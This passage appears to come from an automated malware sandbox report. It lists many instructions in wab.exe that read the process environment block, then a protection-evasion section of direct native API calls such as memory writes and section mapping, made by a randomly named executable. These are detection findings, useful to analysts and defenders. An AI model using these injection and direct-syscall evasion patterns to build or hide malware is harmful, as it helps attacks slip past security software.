          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B402E1 mov eax, dword ptr fs:[00000030h]15_2_23B402E1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B402E1 mov eax, dword ptr fs:[00000030h]15_2_23B402E1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B402E1 mov eax, dword ptr fs:[00000030h]15_2_23B402E1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2B2D3 mov eax, dword ptr fs:[00000030h]15_2_23B2B2D3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2B2D3 mov eax, dword ptr fs:[00000030h]15_2_23B2B2D3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2B2D3 mov eax, dword ptr fs:[00000030h]15_2_23B2B2D3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5F2D0 mov eax, dword ptr fs:[00000030h]15_2_23B5F2D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5F2D0 mov eax, dword ptr fs:[00000030h]15_2_23B5F2D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3A2C3 mov eax, dword ptr fs:[00000030h]15_2_23B3A2C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3A2C3 mov eax, dword ptr fs:[00000030h]15_2_23B3A2C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3A2C3 mov eax, dword ptr fs:[00000030h]15_2_23B3A2C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3A2C3 mov eax, dword ptr fs:[00000030h]15_2_23B3A2C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3A2C3 mov eax, dword ptr fs:[00000030h]15_2_23B3A2C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h]15_2_23B5B2C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h]15_2_23B5B2C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h]15_2_23B5B2C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h]15_2_23B5B2C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h]15_2_23B5B2C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h]15_2_23B5B2C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h]15_2_23B5B2C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B392C5 mov eax, dword ptr fs:[00000030h]15_2_23B392C5
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B392C5 mov eax, dword ptr fs:[00000030h]15_2_23B392C5
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2823B mov eax, dword ptr fs:[00000030h]15_2_23B2823B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B67208 mov eax, dword ptr fs:[00000030h]15_2_23B67208
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B67208 mov eax, dword ptr fs:[00000030h]15_2_23B67208
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B59274 mov eax, dword ptr fs:[00000030h]15_2_23B59274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B71270 mov eax, dword ptr fs:[00000030h]15_2_23B71270
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B71270 mov eax, dword ptr fs:[00000030h]15_2_23B71270
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h]15_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B34260 mov eax, dword ptr fs:[00000030h]15_2_23B34260
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B34260 mov eax, dword ptr fs:[00000030h]15_2_23B34260
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B34260 mov eax, dword ptr fs:[00000030h]15_2_23B34260
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BFD26B mov eax, dword ptr fs:[00000030h]15_2_23BFD26B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BFD26B mov eax, dword ptr fs:[00000030h]15_2_23BFD26B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2826B mov eax, dword ptr fs:[00000030h]15_2_23B2826B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2A250 mov eax, dword ptr fs:[00000030h]15_2_23B2A250
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C05227 mov eax, dword ptr fs:[00000030h]15_2_23C05227
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BEB256 mov eax, dword ptr fs:[00000030h]15_2_23BEB256
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BEB256 mov eax, dword ptr fs:[00000030h]15_2_23BEB256
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B36259 mov eax, dword ptr fs:[00000030h]15_2_23B36259
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B29240 mov eax, dword ptr fs:[00000030h]15_2_23B29240
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B29240 mov eax, dword ptr fs:[00000030h]15_2_23B29240
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6724D mov eax, dword ptr fs:[00000030h]15_2_23B6724D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4B1B0 mov eax, dword ptr fs:[00000030h]15_2_23B4B1B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C051CB mov eax, dword ptr fs:[00000030h]15_2_23C051CB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE11A4 mov eax, dword ptr fs:[00000030h]15_2_23BE11A4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE11A4 mov eax, dword ptr fs:[00000030h]15_2_23BE11A4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE11A4 mov eax, dword ptr fs:[00000030h]15_2_23BE11A4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE11A4 mov eax, dword ptr fs:[00000030h]15_2_23BE11A4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB019F mov eax, dword ptr fs:[00000030h]15_2_23BB019F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB019F mov eax, dword ptr fs:[00000030h]15_2_23BB019F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB019F mov eax, dword ptr fs:[00000030h]15_2_23BB019F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB019F mov eax, dword ptr fs:[00000030h]15_2_23BB019F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2A197 mov eax, dword ptr fs:[00000030h]15_2_23B2A197
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2A197 mov eax, dword ptr fs:[00000030h]15_2_23B2A197
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2A197 mov eax, dword ptr fs:[00000030h]15_2_23B2A197
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C061E5 mov eax, dword ptr fs:[00000030h]15_2_23C061E5
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B87190 mov eax, dword ptr fs:[00000030h]15_2_23B87190
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B70185 mov eax, dword ptr fs:[00000030h]15_2_23B70185
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BEC188 mov eax, dword ptr fs:[00000030h]15_2_23BEC188
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BEC188 mov eax, dword ptr fs:[00000030h]15_2_23BEC188
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BD71F9 mov esi, dword ptr fs:[00000030h]15_2_23BD71F9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B601F8 mov eax, dword ptr fs:[00000030h]15_2_23B601F8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h]15_2_23B551EF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B351ED mov eax, dword ptr fs:[00000030h]15_2_23B351ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6D1D0 mov eax, dword ptr fs:[00000030h]15_2_23B6D1D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6D1D0 mov ecx, dword ptr fs:[00000030h]15_2_23B6D1D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAE1D0 mov eax, dword ptr fs:[00000030h]15_2_23BAE1D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAE1D0 mov eax, dword ptr fs:[00000030h]15_2_23BAE1D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAE1D0 mov ecx, dword ptr fs:[00000030h]15_2_23BAE1D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAE1D0 mov eax, dword ptr fs:[00000030h]15_2_23BAE1D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAE1D0 mov eax, dword ptr fs:[00000030h]15_2_23BAE1D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF61C3 mov eax, dword ptr fs:[00000030h]15_2_23BF61C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF61C3 mov eax, dword ptr fs:[00000030h]15_2_23BF61C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B31131 mov eax, dword ptr fs:[00000030h]15_2_23B31131
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B31131 mov eax, dword ptr fs:[00000030h]15_2_23B31131
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2B136 mov eax, dword ptr fs:[00000030h]15_2_23B2B136
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2B136 mov eax, dword ptr fs:[00000030h]15_2_23B2B136
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2B136 mov eax, dword ptr fs:[00000030h]15_2_23B2B136
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2B136 mov eax, dword ptr fs:[00000030h]15_2_23B2B136
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C05152 mov eax, dword ptr fs:[00000030h]15_2_23C05152
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B60124 mov eax, dword ptr fs:[00000030h]15_2_23B60124
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BDA118 mov ecx, dword ptr fs:[00000030h]15_2_23BDA118
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BDA118 mov eax, dword ptr fs:[00000030h]15_2_23BDA118
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BDA118 mov eax, dword ptr fs:[00000030h]15_2_23BDA118
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BDA118 mov eax, dword ptr fs:[00000030h]15_2_23BDA118
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF0115 mov eax, dword ptr fs:[00000030h]15_2_23BF0115
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h]15_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC9179 mov eax, dword ptr fs:[00000030h]15_2_23BC9179
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B37152 mov eax, dword ptr fs:[00000030h]15_2_23B37152
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2C156 mov eax, dword ptr fs:[00000030h]15_2_23B2C156
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC8158 mov eax, dword ptr fs:[00000030h]15_2_23BC8158
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B36154 mov eax, dword ptr fs:[00000030h]15_2_23B36154
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B36154 mov eax, dword ptr fs:[00000030h]15_2_23B36154
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC4144 mov eax, dword ptr fs:[00000030h]15_2_23BC4144
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC4144 mov eax, dword ptr fs:[00000030h]15_2_23BC4144
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC4144 mov ecx, dword ptr fs:[00000030h]15_2_23BC4144
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC4144 mov eax, dword ptr fs:[00000030h]15_2_23BC4144
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC4144 mov eax, dword ptr fs:[00000030h]15_2_23BC4144
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B29148 mov eax, dword ptr fs:[00000030h]15_2_23B29148
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B29148 mov eax, dword ptr fs:[00000030h]15_2_23B29148
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B29148 mov eax, dword ptr fs:[00000030h]15_2_23B29148
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B29148 mov eax, dword ptr fs:[00000030h]15_2_23B29148
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF60B8 mov eax, dword ptr fs:[00000030h]15_2_23BF60B8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF60B8 mov ecx, dword ptr fs:[00000030h]15_2_23BF60B8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C050D9 mov eax, dword ptr fs:[00000030h]15_2_23C050D9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B35096 mov eax, dword ptr fs:[00000030h]15_2_23B35096
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5D090 mov eax, dword ptr fs:[00000030h]15_2_23B5D090
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5D090 mov eax, dword ptr fs:[00000030h]15_2_23B5D090
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6909C mov eax, dword ptr fs:[00000030h]15_2_23B6909C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3208A mov eax, dword ptr fs:[00000030h]15_2_23B3208A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2D08D mov eax, dword ptr fs:[00000030h]15_2_23B2D08D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2C0F0 mov eax, dword ptr fs:[00000030h]15_2_23B2C0F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B720F0 mov ecx, dword ptr fs:[00000030h]15_2_23B720F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B550E4 mov eax, dword ptr fs:[00000030h]15_2_23B550E4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B550E4 mov ecx, dword ptr fs:[00000030h]15_2_23B550E4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2A0E3 mov ecx, dword ptr fs:[00000030h]15_2_23B2A0E3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B380E9 mov eax, dword ptr fs:[00000030h]15_2_23B380E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB60E0 mov eax, dword ptr fs:[00000030h]15_2_23BB60E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB20DE mov eax, dword ptr fs:[00000030h]15_2_23BB20DE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B590DB mov eax, dword ptr fs:[00000030h]15_2_23B590DB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h]15_2_23B470C0

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtOpenKeyEx: Direct from: 0x76F03C9C
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtClose: Direct from: 0x76F02B6C
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtOpenSection: Direct from: 0x76F02E0C
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtSetInformationThread: Direct from: 0x76EF63F9
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtQueryValueKey: Direct from: 0x76F02BEC
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtCreateFile: Direct from: 0x76F02FEC
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtOpenFile: Direct from: 0x76F02DCC
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtCreateMutant: Direct from: 0x76F035CC
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
